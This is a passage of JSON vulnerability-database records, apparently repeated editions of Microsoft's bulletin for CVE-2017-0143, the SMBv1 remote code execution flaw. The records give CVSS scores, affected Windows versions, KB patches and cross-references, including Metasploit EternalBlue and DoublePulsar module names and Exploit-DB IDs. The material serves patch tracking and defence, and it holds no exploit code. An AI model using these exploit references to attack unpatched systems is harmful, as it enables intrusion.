"msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-08T16:54:43", "differentElements": ["msAffectedSoftware"], "edition": 22}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-09T05:02:02", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-08T16:54:43", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-08T16:54:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB4012213", "KB3177186", "KB3205409", "KBMS16-110, 3187754", "KB4013198", "KB3210721", "KB3212646", "KB4012214", "KB4012606", "KB3210720", "KB4012216", "KB4012217", "KB4012215", "KB4012598", "KB3205401", "KB4012212", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-09T05:02:02", "differentElements": ["msAffectedSoftware"], "edition": 23}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-09T06:50:25", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012214", "KB4012217", "KB4012216", "KB4013198", "KB3212646", "KBMS16-110, 3187754", "KB4012215", "KB3210721", "KB3177186", "KB4012598", "KB3205401", "KB4013429", "KB4012213", "KB4012606", "KB3213986", "KB3210720", "KB4012212"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-09T06:50:25", "differentElements": ["msAffectedSoftware"], "edition": 24}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-10T08:45:32", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": 